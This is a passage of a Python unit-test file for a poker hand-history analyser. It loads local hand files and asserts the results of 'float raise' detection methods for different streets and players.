self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCC__T__XXBFC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr3r__F__BCF__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__BCF__T__XBRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCC__T__XXX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__BRF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBFC__T__XX__R__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XBF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XBRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr3r__F__XBCF__T__XX__R__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'kr'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XX__R__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XX__R__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(True, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
file = 'in2gr2r__F__XBC__T__XBC__R__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'river', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(False, tmp.float_raise_def_opp(), msg=file + ' ' + strt + ' ' + plr)
def test_enum_float_raise_def(self):
# folder where are correct anserws
folder = f + '/testy/rece/'
file = 'in0gr2r__F__BC__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in0gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__XBC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__XX.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__BRC.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'flop', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'sf'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
strt, plr = 'turn', 'zw'
tmp = Float(hand, strt, plr)
self.assertEqual(None, tmp.enum_float_raise_def(), msg=file + ' ' + strt + ' ' + plr)
file = 'in1gr2r__F__BC__T__BF.txt'
with open(folder + file) as data:
hand = Reka(data.readlines())
strt, plr = 'flop', 'sf'
tmp = Float(hand, strt, plr)
